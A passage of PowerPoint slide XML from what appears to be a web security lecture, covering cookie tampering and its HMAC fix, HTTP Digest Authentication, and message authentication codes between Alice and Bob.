            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Set-cookie: price=299.99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>User edits the cookie…  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie: price=29.99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookies have no integrity protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>What’s the solution?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Add an HMAC to every cookie, computed with the server’s secret key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Price=299.99; HMAC(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ServerKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 299.99)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>But what if the website changes the price?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1057974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5645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645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64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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687CDB19-73DC-5B4F-8752-EF9784268730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92075" tIns="46038" rIns="92075" bIns="46038" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>HTTP Digest Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5124" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F2EBD85-2E33-3142-9D70-00149A41B7DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2222655"/>
            <a:ext cx="1676400" cy="3886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5125" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{357C10DA-760F-B74D-ABA8-5D804D6A3ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="2222655"/>
            <a:ext cx="1676400" cy="3886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5126" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{589CCB98-91B7-4F42-B689-12862D75DABB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="1689255"/>
            <a:ext cx="857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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5127" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFF5FA14-0E35-A942-9B94-8EAB13B043D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8018464" y="1689255"/>
            <a:ext cx="9573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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5128" name="Picture 7" descr="internet-explorer-small">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76534B70-D857-5A42-B358-132E8C76A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364069"/>
            <a:ext cx="896938" cy="8969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129" name="Picture 8" descr="Apache">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DBCE789-885D-C546-96CB-9DA764D70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876" y="3489481"/>
            <a:ext cx="1609725" cy="4857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130" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F3C86BF-0602-B545-8115-5DCE87496C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="2527455"/>
            <a:ext cx="3505200" cy="15240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5131" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6C69171-C189-3E40-AD50-787C148AB6BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4638675" y="2171856"/>
            <a:ext cx="2260555" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Request URL with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET or POST method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5132" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E9F3C7C-31F4-1D4D-87D6-B624FF3267C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4191000" y="3213255"/>
            <a:ext cx="3505200" cy="53340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5133" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73616C97-5767-6A46-B809-D61AF95FC634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4514850" y="3137055"/>
            <a:ext cx="3028950" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> HTTP 401 Unauthorised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Authentication “realm”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (description of system being accessed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Fresh, random nonce</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5134" name="Line 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D6EBE0C-BC54-F84C-AC8F-C6DD7813406B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="4737255"/>
            <a:ext cx="3352800" cy="585788"/>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5137" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9E224C-8095-0945-9584-4E2A23305B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="4519768"/>
            <a:ext cx="2667000" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>H1=hash(username,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>       realm, password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>H2=hash(method, URL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08F47AB0-CBF5-044D-B18A-2D471289ED38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="5510369"/>
            <a:ext cx="3733800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WWW-Authenticate:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Basic realm="Password Required"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B6EC7D-4A1B-C34C-BE3A-2EE02C68F083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6234114" y="4742019"/>
            <a:ext cx="1533525" cy="3175"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F95421B9-EA8E-404D-A964-A80129CEE542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="683792" y="2366961"/>
            <a:ext cx="2278872"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6" name="Text Box 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B5532DD-5908-A749-AC2C-779E7DD34E4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7658679" y="4914924"/>
            <a:ext cx="1751442" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Recompute H3 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>and verify </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5135" name="Text Box 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F78697-D004-C248-BC71-E020BB013034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="4813455"/>
            <a:ext cx="3098800" cy="338138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>H3=hash(H1, server nonce, H2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1573180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2" grpId="0" animBg="1"/>
      <p:bldP spid="5133" grpId="0" animBg="1"/>
      <p:bldP spid="5134" grpId="0" animBg="1"/>
      <p:bldP spid="5137" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="5136" grpId="0" animBg="1"/>
      <p:bldP spid="51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3" descr="PE03749_">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7219C1E3-EDB0-4645-A8FC-2EF2B8269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1" y="3031229"/>
            <a:ext cx="7159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4" descr="j0139031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72525085-4633-8245-8D20-168AE5621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700" y="2039041"/>
            <a:ext cx="469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4373" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AF40255-1A75-D344-81A5-EF332E37242F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1577745" y="5527752"/>
            <a:ext cx="86298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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Integrity and authentication: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>only someone who knows KEY can compute correct MAC for a given message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24583" name="Picture 6" descr="PE03749_">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01018B4A-AFB2-7843-A66D-C9FE0B50D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904288" y="3029641"/>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 Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78FA9C2-19E9-174E-ABAF-F7338D968CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2279650" y="4129779"/>
            <a:ext cx="808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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24585" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB10668-9AED-AF49-8239-BB1FCE5E86C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8980489" y="4096442"/>
            <a:ext cx="7039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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Bob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24586" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14112A76-8892-9E4B-BD08-E30EDFC06DF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8994776" y="2381941"/>
            <a:ext cx="1520825" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13046"/>
              <a:gd name="adj2" fmla="val 114421"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEn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1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>KEY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24587" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28CAA8CD-35DA-EA4E-8F2D-5D565CDE8D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2309814" y="2191441"/>
            <a:ext cx="1520825" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -16806"/>
              <a:gd name="adj2" fmla="val 106731"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEn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1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>KEY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F4F1F1-ACED-9746-9BA8-C0F28F862CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3475038" y="3237605"/>
            <a:ext cx="304800" cy="892175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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24589" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
